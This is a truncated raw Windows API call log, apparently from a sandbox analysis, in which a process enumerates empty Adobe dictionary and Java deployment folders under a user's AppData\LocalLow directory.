[0207.326] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.326] PathFindFileNameW (pszPath="") returned="" [0207.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.326] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.326] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.326] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.326] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.326] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\") returned="itl\\" [0207.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.327] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.327] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.327] PathFindFileNameW (pszPath="") returned="" [0207.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.327] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.327] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.327] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.327] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.327] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\") returned="nrw\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.328] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.328] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.328] PathFindFileNameW (pszPath="") returned="" [0207.328] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.328] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.328] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.328] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.329] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.329] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\") returned="prt\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.329] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.329] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.329] PathFindFileNameW (pszPath="") returned="" [0207.329] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.329] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.329] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.330] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.330] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.330] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\") returned="spn\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.330] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.330] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.330] PathFindFileNameW (pszPath="") returned="" [0207.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.331] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.331] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.331] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.331] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.331] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\") returned="swd\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.331] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.331] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.331] PathFindFileNameW (pszPath="") returned="" [0207.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.332] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.332] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.332] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.332] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.332] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\") returned="si\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.332] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.332] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.333] PathFindFileNameW (pszPath="") returned="" [0207.333] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd78 | out: hHeap=0x2c0000) returned 1 [0207.333] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.333] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: 